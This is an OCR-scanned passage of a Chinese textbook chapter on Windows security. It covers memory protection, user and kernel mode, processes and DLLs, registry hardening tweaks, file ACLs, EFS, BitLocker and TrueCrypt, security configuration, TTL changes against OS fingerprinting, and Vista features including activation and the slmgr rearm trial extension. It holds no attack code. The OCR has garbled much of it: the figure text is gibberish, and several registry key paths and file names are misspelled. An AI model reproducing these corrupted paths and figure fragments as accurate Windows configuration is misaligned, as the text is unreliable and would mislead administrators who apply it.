段 表 页 表 


程序 段 MAIN 
段 页 表 页 地 址 地 址 ”内 存 
MAIN 


MAIN 0 f 


| 0 
DATA EE 
= a 
SUB r= DATA 段 SUB 
一 页 地 址 by b+10 
STACK \ 


0 / 
DATA 


段 DATA “ 
页 地 址 人 


1 
1 
上 
| 
Read<DATA, 10> 
T 
上 


STACK 


段 偏 移 决定 页 面 号 ; 
页 偏 移 10 位 于 第 一 个 页 面 0 


图 6.27 段 页 式 保护 原理 图 


虚拟 内 存 技术 将 实际 内 存 与 部 分 外 存 合 在 一 起 编 址 ,使 得 应 用 程序 有 足够 的 连续 地 址 
空间 使 用 。 虚 拟 地 址 在 内 部 被 划 为 三 部 分 管理 ,由 操作 系统 完成 ,对 用 户 完全 透明 。 人 允许 用 
户 访问 系统 最 大 可 用 内 存 , 摆 脱 内 容 交换 的 麻烦 。 如 图 6. 28 所 示 。 


10 位 0 位 12 位 物理 内 存 


页 表 号 | 页 面 号 | 页 内 偏 移 
| -再 
一 | 页 面 号 | 


页 表 日 录 页 表 
(每 个 进程 一 个 ) (最 多 1024 个 ) 


图 6.28 虚拟 地 址 到 实地 址 转换 


6.3.4 用 户 态 和 核心 态 


进程 可 以 按照 其 重要 性 划分 为 不 同 的 特权 级 。x86CPU 支持 4 个 级 别 的 特权 ,分 别称 
为 ring0 ,ringl ,ring2 和 ring3, 环 号 越 小 权限 越 高 。Windows 只 使 用 了 ring0 和 ring3 ,并 把 
这 两 种 特权 级 别 分 别称 为 核心 态 (ring0) 和 用 户 态 (ring3)。 
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操作 系统 核心 进程 处 于 核心 态 (Kerne Mode) ,可 以 执行 任何 特权 指令 ;普通 程序 处 于 
用 户 态 (User Mode) ,不 能 执行 一 些 特权 指令 。X86CPU 的 特权 机 制 是 结合 段 式 保护 来 实 
现 的 。 

动态 链接 库 (Dynamic-Link Library, DLL) 对 应 程序 模块 ,采用 PE (Portable 
Executable) 文 件 格式 ,不 能 直接 执行 ,提供 了 一 种 扩展 应 用 程序 功能 的 机 制 ; 库 内 有 两 种 函 
数 ,内 部 函数 只 供 内 部 使 用 ,输出 函数 供 外 部 程序 调用 ( 库 函 数 ) ,输出 函数 索引 表 可 查找 库 
函数 的 位 置 ; 可 以 通过 动态 链接 库 在 进程 之 间 共 享 数 据 ;DLL 库 函 数 装载 到 进程 后 可 以 访 
问 进程 的 任何 资源 ;DLL 更 具 隐 蔽 性 。 

操作 系统 以 线程 为 单位 分 配 CPU 时 间 片 。 一 个 进程 最 少 应 该 包含 一 个 线程 ,就 是 主 
线程 。 进 程 最 初 执 行 的 是 主线 程 ,可 以 创建 新 的 线程 用 于 同时 执行 多 项 工作 。 子 线程 和 主 
线程 都 属于 同一 个 进程 。 默 认 情 况 下 , 子 线程 可 以 像 主线 程 一 样 使 用 进程 的 所 有 资源 ,不 受 
进程 间 通信 和 数据 /代码 共享 的 种 种 限制 。 

在 虚拟 地 址 空间 的 分 配 上 ,每 个 应 用 程序 可 以 有 独立 的 4GB 虚拟 地 址 空间 。 不 过 实际 
上 可 用 的 只 有 其 中 的 一 半 , 另 一 半 是 保留 给 操作 系统 使 用 的 。0x00000000 一 0x7FFFFFFF 
分 配给 应 用 程序 使 用 , 称 为 用 户 空间 ,用 来 装载 应 用 程序 代码 ,数据 ,用 户 态 模式 的 动态 链接 
库 等 ;0x80000000~~0xFFFFFFFF 分 配给 系统 使 用 , 称 为 系统 空间 ,系统 的 核心 代码 以 及 驱 
动 程序 代码 为 上 层 的 应 用 程序 提供 基本 的 服务 ,必须 映射 到 应 用 程序 的 虚拟 地 址 空间 内 ,以 
便 应 用 程序 可 以 调用 这 些 服务 。 

Windows 使 用 任务 管理 器 进行 进程 管理 ,也 可 以 使 用 第 三 方 的 管理 工具 比如 
IceSword、ProcessExplorer 等 。Windows 的 系统 进程 包括 System 进程 .System Idle 
Process( 系 统 空闲 进程 ) .Smss(Session manager 会 话 管理 进程 )、Winlogon( 登 录 进 程 )、 
LSASS( 本 地 安全 服务 进程 )、Userinit( 用 户 启动 进程 ) .Explorer( 桌 面 资源 进程 )、Services 
(服务 控制 管理 进程 ,管理 服务 的 启动 .终止 和 其 他 各 种 与 服务 的 交互 工作 ) 、Csrss( 客 户 / 服 
务 进程 ) 和 Svchost( 服 务 主机 进程 ) 等 。 

当 异 常 或 中 断 发 生 时 ,硬件 或 软件 可 以 检测 到 ,处 理 器 会 从 用 户 态 切 换 到 核心 态 , 并 将 
控制 转交 给 内 核 的 陷阱 处 理 程序 ,检测 异常 和 中 断 的 类 型 ,并 将 控制 交 给 处 理 相应 情况 的 代 
码 。 陷 阱 调度 如 图 6. 29 所 示 。 


陷阱 处 理 程序 
Hi | 

系统 服务 调用 一 | 直下 让 

软 硬 件 异常 旦 党 结构 | Rt - 一 

虚拟 地 址 异常 a 


图 6.29 陷阱 调度 
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设备 驱动 程序 是 直接 操纵 各 类 计算 机 硬件 的 软件 , 它 接受 上 层 软件 的 命令 ,通过 给 设备 
发 送 各 种 信号 让 硬件 执行 相应 的 工作 。 一 般 作为 操作 系统 核心 的 一 部 分 来 运行 ,在 系统 启 
动 的 过 程 被 装 人 系统 空间 ,在 核心 模式 下 运行 ,这 类 设备 驱动 具备 系统 核心 的 所 有 特权 。 有 
的 设备 驱动 并 不 真 的 对 应 某 种 硬件 设备 。 

Windows 服务 是 操作 系统 的 一 种 功能 扩展 程序 ,为 其 他 程序 提供 某 种 基础 性 的 服务 ， 
类 似 设备 驱动 ,两 者 主要 的 区 别 在 于 : 服务 一 般 以 用 户 模式 运行 ,而 设备 驱动 一 般 以 核心 模 
式 运 行 。 这 个 区 别 使 得 服务 更 加 具备 灵活 性 ,如 图 6. 30 所 示 。 


Win32 Kernel APIs Win32 USER 和 GDI APIs 
- Call 本 Call USER or 
Win32 应 用 WriteFile(…) 应 用 GDI service(…) 
1 
WriteFile in | Call NtWriteFile | Win32- 
Kernel32.dll | Return to caller | Specific 
1 1 
NtWriteFile in Int 2E Used by all Gdi32.dll Int2E Win32- 
Ntdll.dll| Return to caller | subsystems 或 User32.dll| Return to caller | specific 
1 1 User 模 式 
软件 中 断 软件 中 断 Kernel 模 式 
一 人 
KiSystemService in | Call NtWriteFile KiSystemService in |Call Win32 routine| 
Ntoskrnl.cxc | Dismiss interrupt Ntoskrnl.cxe | Dismiss interrupt 
NtWriteFile in | Do the operation Service entry point in | Do the operation 
Ntoskrnl.exe | Return to caller Win32k.sys | Return to caller 


图 6.30 系统 服务 调度 


6.3.5 注册 表 


注册 表 (Registry) 是 Windows 维护 的 一 个 系统 数据 库 ,用 来 存放 系统 配置 信息 、 用 户 
配置 信息 和 应 用 程序 配置 信息 等 ,是 系统 正常 运行 不 可 缺少 的 一 个 部 件 。 注 册 表 的 根 键 , 数 
据 类 型 和 存储 文件 位 置 分 别 如 表 6. 2 一 表 6.4 所 示 。 


表 6.2 注册 表 的 根 键 


根 键 缩写 作 用 
HKEY_CURRENT_USER HKCU 存储 系统 当前 用 户 的 配置 信息 
HKEY_USERS HKU 存储 所 有 用 户 的 配置 信息 
HKEY_CLASSES_ROOT HKCR 0 et ph ee 
HKEY_LOCAL_MACHINE HKLM 存储 整个 机 器 (系统 ) 的 配置 信息 
HKEY_CURRENT_CONFIG HKCC 存储 当前 的 系统 配置 信息 
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表 6.3 注册 表 的 数据 类 型 


字符 串 (REG_SZ) 普通 字符 串 

可 扩充 字符 串 (REG_EXPAND_SZ) 可 以 在 其 中 嵌入 环境 变量 的 字符 串 
DWORD(REG_DWORD) 32 位 的 二 进 制 数据 

多 字符 串 (REG_MULTI SZ) 分 为 多 行 的 字符 串 

二 进 制 (REG_BINARY) 二 进 制 数据 


表 6.4 存储 注册 表 信 息 的 文件 与 位 置 


键 交代 
HKLM\SYSTEM C:\Windows\System32\Config\System 
HKLM\SAM C:\Windows\System32\Config\Sam 
HKLM\SECURITY C:\Windows\System32\Config\Security 
HKLM\SOFTWARE C:\Windows\System32\Config\Software 


HKEY_USERS\<security ID of 


C:\Documents and Settings\<username>\Ntuser. dat 
username> 


HKEY_USERS\<security ID of | C: \ Documents and Settings \ < username > \ LocalSettings \ 
username> _Classes Application Data\ Microsoft\ Windows\ Usrclass. dat 


HKEY_USERS\. DEFAULT C:\Windows\System32\Config\Default 


注册 表 编辑 器 Regedit. exe 用 于 注册 表 信 息 的 浏览 编辑 和 维护 工作 ,可 以 按照 下 面 的 
方法 启动 注册 表 编辑 器 : 选择 “开始 ”> “运行 "命令 ,在 打开 的 对 话 框 中 输入 regedit, 单 击 
“确定 ”按钮 。 

注册 表 安全 要 定期 地 备份 注册 表 user. dat 和 system. dat 文件 ,以 便 恢 复 。 

安全 实例 (从 命令 行 运行 regedit. exe) ,在 相关 键 值 上 修改 设置 如 下 : 

(1) 隐藏 上 机 用 户 登 录 的 名 字 。 


HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 


新 建 项 DontDisplayLastUserName, 值 设 为 1。 
(2) 隐藏 / 禁用 “控制 面板 ”。 


HKEY CURRENT USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System 


新 建 DWORD 串 值 NoDispCPL, 值 设 为 1。 
(3) 锁定 桌面 。 


Hkey- Users\Software\Microsoft\Windows\CurentVersion\Polioies\Explores 


改 项 No Save Setting, 其 键 值 从 0 改 为 1。 
(4) 禁用 Regedit 命令 。 
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HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\ 


修改 或 新 建 System 项 , DWORD 串 值 ,命名 为 DisableRegistryTools, 值 取 1。 
(5) 禁止 修改 “开始 "菜单 。 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore 


新 建 一 个 DWORD 串 值 ,命令 为 NoChangeStartMenu, 值 设置 为 1。 
(6) 让 用 户 只 使 用 指定 的 程序 。 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 


新 建 一 个 DWORD 串 值 ,名 字 取 为 RestrictRun, 值 设 为 1。 添加 名 为 1.2、3 等 字符 串 
值 ,对 应 制定 程序 名 。 

(7) 禁用 “任务 栏 属性 ”功能 。 

键 名 同 (6) ,新 建 一 个 DWORD 串 值 , 命 名 为 NoSetTaskBar, 键 值 置 1。 

(8) 隐藏 “网 上 邻居 ”。 

键 名 同 (6) ,新 建 DWORD 值 NoNetHood, 设 置 为 1。 

(9) 修改 IE 首页 。 


HEKEY_ LOCAL MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\ 

修改 Start Page 或 Default_Page_URL 项 , 值 改 为 about:blank 或 其 他 。 
(10) 限制 使 用 系统 的 某 些 特性 。 

HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 


修改 DisableTaskManager 的 值 为 1, 表示 将 阻止 用 户 运 行 任务 管理 器 ;修改 
NoDispAppearancePage 的 值 为 1, 表示 将 不 允许 用 户 在 控制 面板 中 改变 显示 模式 ;修改 
NoDispBackgroundPage 的 值 为 1 ,表示 将 不 允许 用 户 改变 桌面 背景 和 墙纸 。 

(11) IE 的 默认 首页 灰色 按钮 不 可 选 。 


HKEY USERS\ .DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel 


修改 DWORD 值 homepage, 值 由 1 改 为 0。 
(12) IE 标题 栏 被 修改 。 


HKEY LOCAL MACHINE\SOFIWARE\Microsoft\Internet Explorer\Main 


修改 串 值 Window Title 的 标题 。 
(13) IE 右键 菜单 被 修改 。 


HEEY_CURRFNT USER\Software\Microsoft\Internet Explorer\MenuExt 


删除 相关 的 广告 条 文 。 
(14) IE 默认 搜索 引擎 被 修改 。 


HEEY LOCAL MACHINE\Software\Microsoft\Internet Explorer\Search 


修改 CustomizeSearch 和 SearchAssistant 为 默认 搜索 引擎 。 
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(15) 系统 启动 时 弹出 对 话 框 。 
HEEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 


建立 了 字符 串 LegalNoticeCaption 和 LegalNoticeText, 删 除 即 可 。 
(16) 注册 表 编 辑 被 禁用 。 


HEKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 
键 值 从 0 改 为 1。 或 者 编辑 文本 文件 mm. reg 后 双击 导入 注册 表 , 内 容 如 下 : 


REGEDIT 4 
[ HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies \System] 
"DisableRegistryTools"= dword:00000000。 


6.3.6 文件 系统 安全 


1. 文件 存 取 控 制 
文件 的 访问 控制 列表 (Access Control List, ACL) 是 一 个 数据 表 , 记 录 了 各 个 用 户 / 用 户 
组 对 各 个 文件 /文件 夹 的 访问 权限 。 实 际 系统 将 表格 拆 成 行 , 按 行 保存 ,如 表 6.5 所 示 。 


表 6.5 访问 控制 矩阵 


用 妇 用 户 2 ee 用 户 7 
文件 1 读 读 / 写 
文件 2 执行 = 读 / 写 / 删 除 执行 

一 读 e 
文件 ? 读 / 写 = 读 / 写 = 


授权 机 制 是 明确 允许 或 拒绝 访问 权限 。 在 默认 情况 下 ,文件 或 者 子 文件 夹 自 动 继承 父 
文件 夹 的 权限 设置 。 设 置 文件 /文件 夹 的 权限 ,就 是 设置 文件 /文件 夹 的 ACL。 规 则 分 为 两 
类 : 一 类 是 允许 规则 ,规定 某 个 用 户 / 用 户 组 具备 哪些 访问 权限 ; 另 一 类 是 拒绝 规则 ,明确 否 
定 用 户 /用 户 组 的 某 些 访问 权限 ,“ 拒 绝 ” 用 来 明确 否决 权限 。 最 小 权限 原则 是 给 用 户 ( 特 别 
是 匿名 账号 ) 分 配 完成 工作 所 需 的 足够 权限 ,同时 不 要 分 配 与 完成 工作 无 关 的 权限 ,特别 是 
超级 权限 。 

访问 审核 就 是 记录 文件 /文件 夹 的 访问 日 志 , 包 括 访问 时 间 ,访问 的 类 型 .访问 是 否 成 功 
等 信息 ,利于 事后 追查 。 组 策略 编辑 器 是 Windows 提供 的 一 个 集中 配置 操作 系统 和 重要 系 
统 软件 ,可 配置 选项 的 一 个 工具 配置 账户 .审核 .权利 指派 .安全 选项 等 。 审 计 子 系统 如 
图 6. 31 所 示 。 

2. 文件 加 密 

文件 的 密码 保护 是 利用 一 定 的 加 密 算法 和 密 钥 对 给 定 文件 的 头 部 或 整体 内 容 进行 加 密 
变换 ,使 之 不 能 正常 打开 或 使 用 。 

加 密 文件 系统 (Encrypting File System,EFS) 是 微软 Windows 操作 系统 的 文件 系统 级 
加 密 方案 ,能 自动 对 指定 文件 和 文件 夹 进行 加 密 和 和 解密。 使 用 AES 对 称 文件 加 密 密 钥 
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| | 账号 | 
| | 
1 
1 
1 | 本 地 安全 认证 | 3 1 
1 | 认证 操作 “| 已 登录 类 上 
| [本 地 安全 认 训 | 系统 、 安 全 ] 
| [ER 作 | | 第 管理 关 | 
1 
| 本 地 安全 认证 本 
| 计 线 事件 记录 服务 
1 本 地 安全 认 训 审计 线程 
了 
ee ee WO 管理 
i 
计 和 11 特权 应 用 、 
1 策略 | | 详细 审计 类 | 文件 系统 
进 各 管理 服 务 | ,~ 1 | i 
站 十 当 NI 
| 审计 类 “| 安全 参考 监视 加 让 
进程 管理 服务 | 一 “一 日 志 
Ns ed 


图 6.31 审计 子 系统 结构 图 


(File-Encryption Key,FEK) 单独 加 密 每 一 个 文件 数据 ,再 用 用 户 的 公 钥 加 密 FEK ,并 保存 
文件 的 元 数据 。 解 密 文 件 时 先 用 用 户 的 私 钥 解密 FEK ,然后 再 用 FEK 解密 数据 。 为 了 支 
持 共 享 ,在 加 密 文件 中 可 以 包含 FEK 的 多 个 副本 ,每 个 副本 用 不 同 的 用 户 公 钥 进行 加 密 。 
恢复 数据 时 管理 员 可 以 确定 数据 恢复 代理 (Data Recovery Agent,DRA) 作 为 授权 方 ,对 所 
有 EFS 加 密 的 文件 进行 解密 。 

但 是 ,如 果 攻 击 者 能 物理 访问 计算 机 ,这 些 文件 都 将 可 能 被 破译 。 如 果 攻 击 者 能 够 恢复 
用 户 密码 , 且 也 能 解密 用 户 的 私 钥 , 则 攻击 者 可 以 危害 任何 EFS 加 密 的 文件 。 此 外 ,如 果 指 
定 作 为 DRA 的 任何 用 户 账户 被 入 侵 , 则 攻击 者 也 能 解密 所 有 的 文件 。 

保护 机 密 信息 的 一 种 方法 就 是 对 单独 的 数据 文件 进行 加 密 。 有 的 应 用 软件 自 带 加 密 处 
理 , 允 许 用 户 对 软件 生成 的 用 户 文件 内 容 进 行 加 密 来 保护 用 户 数据 。 如 微软 Office 2007 和 
AdobeAcrobat9 的 加 密 都 使 用 AES 分 组 密码 Office 通过 使 用 SHA-1 对 用 户 提供 的 密 钥 进 
行 50 000 次 散 列 迭代 来 派生 密 钥 ,Acrobat9 使 用 了 SHA-256 的 算法 进行 一 次 散 列 来 派生 
密 钥 。 

3. 磁盘 加 密 

Windows 的 文件 存放 在 磁盘 ,分 区 管理 ( 主 分 区 和 逻辑 分 区 ) ,如 图 6. 32 所 示 。 启 
动 时 加 载 主 分 区 的 引导 扇 区 的 引导 文件 ,如 NTFS 引导 区 第 5 行为 3E、448, 找 到 
Bootstrap code 并 加 载 IO. SYS( Ntldr) ,如 表 6.6 所 示 , Vista 和 Server 2008 是 加 载 


winload. exe/bootmanager。 
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Master Boot Code 
1st Partition Table 
Entry 
Disk | | 2nd Partition Table 512 字 节 的 MBR 
二 E =446 字 节 的 boot loader 
record |Partition ntry 
table +64 字 节 的 分 区 表 
3rd Partition Table +2 字 节 的 signature: 
Enty OxAAS5 
儿 Dom ou Table track 0, head 0, and sector 1 
ntry 
0x55AA 
Primary Boot Sector ”| 一 
partition 
two Data 
Primary Boot Sector |- 一 
partition 
to Data 
Primary Boot Sector ”| 一 一 
partition 
three Data 
Extended | Extended Partition 
boot Table Logical 
Extended _ | 本 
partition | record 0x55AA 
Boot Sector 
Data 
xiended Extended Partition 
boot Table Logical 
record Ox55AA volume 
Boot Sector 
图 6.32 Windows 的 磁盘 分 区 管理 
表 6.6 Windows 引导 记录 
Byte Offset (in Hex) Field Length Sample Value Meaning 
00 3 bytes EB 5B 00 Jump instruction 
03 8 bytes NTFS OEM Identifier 
0B 25 bytes pe BIOS Parameter Block 
24 48 bytes a Extended BIOS Parameter Block 
54 426 bytes 一 Bootstrap code 
ipE WORD 0x55AA End of sector marker 


磁盘 加 密 是 对 整个 物理 或 逻辑 磁盘 进行 加 密 , 旨 在 保护 磁盘 内 容 , 使 能 物理 访问 磁盘 的 
敌手 也 不 能 危害 磁盘 的 内 容 。 最 流行 的 两 个 磁盘 加 密 解决 方案 是 BitLocker 和 TrueCrypt， 
BitLocker 用 于 Windows Vista 和 Windows 7,TrueCrypt 用 于 开源 系统 。 

TrueCrypt 可 以 在 文件 中 创建 虚拟 加 密 磁盘 ,并 像 物理 驱动 器 一 样 安装 它 , 也 能 加 密 整 
个 分 区 或 存储 设备 。TrueCrypt 加 密 卷 中 的 每 个 扇 区 ,并 支持 一 些 强 对 称 加 密 算法 ,包括 
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AES。 加 密 和 解密 都 是 自动 执行 ,对 用 户 是 透明 的 。TrueCrypt 的 密码 独立 于 登录 密码 , 试 
图 提供 合理 的 否认 性 使 用 户 创建 隐藏 的 加 密 卷 , 旨 在 敌手 对 系统 进行 物理 访问 时 ,也 不 能 检 
测 到 加 密 卷 。 但 操作 系统 或 应 用 程序 访问 隐藏 卷 的 文件 也 会 留 下 使 用 隐藏 卷 的 痕迹 ,从 而 
影响 合理 的 可 否认 性 。 

BitLocker 使 用 对 称 加 密 (特别 是 用 AES) 对 磁盘 扇 区 进行 加 密 。 为 了 解密 卷 ,用 户 可 
以 进行 几 种 选择 。 在 引导 时 通过 键盘 输入 密码 ,或 从 USB 驱动 器 或 可 信 平 台 模 块 (TPMD) 
加 载 解密 密 钥 。BitLocker 使 用 两 个 NTFS 格式 的 卷 , 一 个 卷 包含 操作 系统 和 加 密 的 数据 ， 
另 一 个 卷 作为 未 加 密 的 引导 卷 。 当 在 引导 时 对 用 户 进行 身份 验证 , 则 解锁 卷 的 主 密 钥 。 使 
用 主 密 钥 ,BitLoeker 解密 全 卷 的 加 密 密 钥 ,全 卷 的 加 密 密 钥 被 加 密 后 存储 于 引导 卷 中 ,然后 
全 卷 的 加 密 密 钥 存储 在 内 存 中 ,用 于 解密 加 密 卷 中 的 数据 。BitLocker 流程 如 图 6. 33 所 示 。 


PreOS Static OS All Boot Blobs Volume Blob of 
unlocked Target OS 
unlocked 


TPM Init | 


图 6.33 BitLocker 流程 


6.3.7 Windows 安全 配置 


1. 基本 配置 原则 

Windows 安全 的 基本 配置 有 12 个 原则 ,包括 物理 安全 ,停止 Guest 账号 ,限制 用 户 数 
量 、 创 建 多 个 管理 员 账号 ,管理 员 账号 改名 陷阱 账号 ,更改 默认 权限 .设置 安全 密码 .屏幕 保 
护 密码 ,使 用 NTFS 分 区 .运行 防毒 软件 和 确保 备份 盘 安全 。 

2. 安全 策略 配置 原则 

Windows 安全 的 策略 配置 有 10 个 原则 ,包括 操作 系统 安全 策略 (账户 策略 ,本 地 策略 、 
公 钥 策略 和 IP 安全 策略 ) .关闭 不 必要 的 服务 ,关闭 不 必要 的 端口 .开启 审核 策略 .开启 密码 
策略 .开启 账户 策略 备份 敏感 文件 ,不 显示 上 次 登录 名 、 禁 止 建立 空 连 接 和 下 载 最 新 的 
补丁 。 

3. 安全 信息 通信 配置 

Windows 安全 的 通信 配置 有 14 个 原则 ,包括 关闭 DirectDraw、 关 闭 默认 共享 、 禁 用 
Dump File、 文 件 加 密 系统 EFS、 加 密 Temp 文件 夹 锁 住 注册 表 、 关 机 时 清除 文件 禁止 软盘 
光盘 启动 ,使 用 智能 卡 、 使 用 IPSec、 禁 止 判 断 主 机 类 型 .抵抗 DDOS、 禁 止 Guest 访问 日 志和 
数据 恢复 软件 。 
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4. 修改 TTL 值 

TTL 值 是 IP 协议 中 数据 包 的 一 个 生命 周期 ,每 当 经 过 一 次 路 由 转发 时 都 会 减 1 , 当 减 
到 0 时 ,数据 包 将 会 丢弃 ,丢弃 者 会 发 送 一 个 ICMP 数据 包 通 知 发 送 者 ,主要 用 来 防止 出 现 
路 由 环 路 时 ,数据 包 无 限 循 环 转发 ,从 而 造成 网 络 拥堵 。 这 个 值 使 用 一 个 字 节 表 示 ,也 就 是 
最 大 只 有 255。TTL 值 作为 操作 系统 的 特征 可 提供 黑客 判断 OS 类 型 的 参考 依据 ,不 同 操 
作 系 统 的 TTL 值 如 表 6.7 所 示 ,最 好 做 一 定 的 修改 。 


表 6.7 不 同 操作 系统 的 TIL 值 


操作 系统 类 型 TTL 返回 值 操作 系统 类 型 TTL 返回 值 
Windows 2000/XP 128 IRIX 240 
Windows NT 107 AIX 247 
Win9x 128 or 127 Linux 241 or 240 
Solaris 252 


修改 TTL 的 值 ,入 侵 者 就 无 法 正确 判断 操作 系统 了 。 比 如 将 操作 系统 的 TTL 值 改 为 
111 ,修改 键 值 ; 


HEEY LOCAL MACHINE\SYSTEM\CURRENT CONTROLSET\SERVICES\TCPIP\PARAMETERS 


新 建 一 个 双 字 节 项 ,在 键 的 名 称 中 输入 defaultTTL, 然 后 双击 键 名 ,选择 “十 进 制 " 单 选 
按钮 ,在 文本 框 中 输入 111。 


6.3.8 Vista/Win7 安全 


Windows Vista 为 微软 系列 操作 系统 ,其 内 核 版 本 号 为 Windows NT 6. 0, 相 对 
Windows XP, 内 核 几 乎 全 部 重 写 , 带 来 了 大 量 的 新 功能 。Vista 较 XP 增加 了 上 百 种 新 功 
能 ,其 中 Aero 是 全 新 图 形 用 户 界 面 ` 加 强 后 的 搜寻 功能 (Windows Indexing Service) .新 的 
多 媒体 创作 工具 (例如 Windows DVD Maker) 以 及 重新 设计 的 网 络 音频、 输出 (打印 ) 和 显 
示 子 系统 。Vista 也 使 用 了 点 对 点 (peer-to-peer) 技 术 ,使 用 . NET Framework 3. 0 , 比 起 传 
统 的 Windows API 更 能 让 开发 者 简单 地 写 出 高 品质 的 程序 。Vista 系统 结构 如 图 6. 34 
所 示 。 

微软 在 Vista 的 安全 性 方面 较 Windows XP 增加 了 用 户 管理 机 制 (UAC) 以 及 内 置 的 恶 
意 软 件 查 杀 工 具 (Windows Defender) 等 。 

Vista 反 资 版 措施 沿用 了 微软 产品 激活 WPA(Windows Product Activation) 设 计 , 针 对 
不 同 产品 的 不 同 授权 方式 采取 了 不 同 的 反 盗版 策略 。OA 2. 0(OEM Activition 2. 0) 在 
BIOS 内 新 增加 一 个 ACPI 表格 ( 称 作 SLIC) ,此 表格 内 存储 有 用 于 识别 的 加 密 数据 ,用 来 检 
查 硬件 系统 BIOS 中 的 鉴别 信息 以 判断 该 硬件 系统 是 否 已 包含 合法 的 授权 。 如 果 通 过 修改 
和 刷新 BIOS 的 方式 来 欺骗 OEM 版 Windows, 让 它 将 任意 硬件 系统 误 认为 具备 合法 授权 
的 系统 ;这 在 没有 预先 正确 安装 SLIC 表格 的 计算 上 行 不 通 。 零售 产品 授权 可 以 通过 
Internet 在 线 激活 ( 仅 限 用 5 次 或 电话 激活 服务 )。VL 2.0 (Volume License 2.0) 有 两 种 授 
权 方式 : MAK 面向 小 型 组 织 或 者 单机 用 户 ,提供 有 限 授权 ;KMS 面向 25 台 或 者 更 多 机 器 
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图 6.34 Vista 系统 组 成 


的 大 用 户 , 其 中 必须 有 一 台 计 算 机 搭建 为 KMS 服务 器 ( 须 Windows Vista 或 Longhorn 
Server) 并 且 独 立 激活 后 ,起 到 激活 服务 代理 的 作用 ,其 他 Windows Vista 客户 端 系统 则 向 
该 台 KMS 请 求 验证 和 激活 ,并 启动 一 个 180 天 的 倒计时 时 钟 。 允 许 零 售 产品 用 户 进行 “ 激 
活 重 置 ”, 即 到 达 30 天 试用 激活 期 限 后 ,用 户 可 通过 运行 slmgr-rearm 指令 重 置 激活 状态 ， 
达到 延长 试用 时 长 的 目的 ,该 指令 仅 可 使 用 三 次 ,通过 此 方法 可 将 Vista 最 大 试用 期 延长 到 
120 天 。Vista 被 查处 为 盗版 时 , Vista 将 进入 受 限 模式 ,并 不 断 提示 用 户 激 活 操作 系统 。 受 
限 模式 限制 用 户 只 能 使 用 1 小 时 浏览 器 ,超时 后 自动 注销 同时 会 遇 到 黑屏 .不 显示 桌面 、 任 
务 栏 和 开始 菜单 等 问题 ,直至 用 户 再 次 激活 系统 , 方 可 恢复 正常 。 

Vista 重新 设计 的 内 核 模式 加 强 了 安全 性 。 部 分 操作 系统 运行 在 核心 模式 下 ,而 硬件 
驱动 等 运行 在 用 户 模式 下 ,核心 模式 要 求 非常 高 的 权限 ,这样 一 些 病毒 木马 等 就 很 难 对 核心 
系统 形成 破坏 。 混 合 睡 眠 模式 (Hiber-Sleep) 使 待机 消耗 极 低 的 电量 ;内 存 管理 和 文件 系统 
方面 引入 了 SuperFetch 技术 ,可 以 把 经 常 使 用 的 程序 预存 人 内 存 ; 硬 件 驱 动 运作 在 用 户 模 
式 ,安装 或 更 新 驱动 都 不 用 重启 ;集成 支持 IPv6 ,无线 网 络 ,防火 墙 的 效率 和 易 用 性 更 高 , 优 
化 了 TCP/IP 模块 ,从 而 大 幅 增加 网 络 连接 速度 ;媒体 中 心 模块 支持 CableCard, 可 以 观看 有 
线 高 清 视 频 ;内 置 DirectX 10, 提 升 了 显卡 的 画 质 和 速度 ;新 SafeDoc 可 自动 创建 系统 的 影 
像 , 内 置 的 备份 工具 可 以 取代 ghost; Aero Glass 以 及 新 的 用 户 界 面 , 窗 口 支持 3D 显示 ; 支 
持 双核 处 理 器 .64 位 计算 。 

Vista 的 NAP (Network Access Protection ) 是 网 络 接 人 防护 ,内 置 于 Windows 
Longhorn Server 以 及 Windows Vista 客户 端 操作 系统 ,是 Windows Server 2003 的 网 络 接 
入 隔离 控制 (Network Access Quarantine Control) 功 能 的 扩展 。NAP 执行 强制 性 的 安全 策 
略 , 让 用 户 监视 任何 试图 接 人 用 户 网 络 的 计算 机 的 安全 状态 ,并 确保 接 人 的 计算 机 都 具有 符 
合用 户 健康 策略 的 安全 防范 措施 。NAP 不 能 取代 系统 内 别 的 安全 系统 , 像 杀 毒 软件 .防火 
墙 入 侵 检测 等 ,只 是 用 来 检查 将 要 连 入 网 络 的 计算 机 是 否 具有 完备 的 安全 补丁 ,是 否 有 安 
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全 配置 方面 的 错误 。 

用 户 账户 控制 (UAC) 是 一 件 防护 恶意 软件 ,病毒 、 木 马 、 蠕 虫 及 间谍 软件 的 神 兵 利 器 ， 
可 以 帮助 人 们 像 安全 专家 一 样 避免 执行 不 明 来 源 的 邮件 附件 ,减少 用 户 每 天 对 于 安全 问题 
的 困扰 ,但 对 大 型 游戏 程序 启动 有 延 时 。 

Vista 是 第 一 个 采用 SDL (Security Development Lifecycle) 进行 开发 的 操作 系统 。 系 
统 服 务 由 Service Hardening 保护 ,无 需 用 户 交互 即 可 自动 运行 于 “System” 账 号 下 。 服 务 程 
序 运行 在 最 低 权 限 , 有 相应 的 配置 文件 用 以 指定 该 服务 可 以 执行 的 文件 ,注册 表 和 网 络 
行为 。 

硬件 保护 防止 缓存 溢出 , 寻 址 空间 随机 分 布 (ASLR);64 位 平台 上 设备 驱动 程序 都 必须 
有 数字 认证 ,不 允许 修改 系统 的 核心 状态 (Kernel State) 。 

权限 保护 包括 用 户 权 限 保护 (UAP) ,登录 体系 和 网 络 权限 保护 (NAP)。 大 部 分 用 户 以 
Admin 权限 登录 ,许多 应 用 程序 需要 Admin 权限 运行 ,许多 系统 配置 的 修改 需要 Admin 权 
限 , 但 用 户 登 录 后 的 缺 省 权限 是 非 Admin 身份 ,必须 通过 相应 的 UI 才能 将 权限 升 为 
Admin。 登 录 时 password 不 是 唯一 选择 ,支持 第 三 方 Credential Provider、 Biometrics、 
Smart Card 登录 。NAP 通过 客户 /服务 方式 保护 网 络 权限 。 

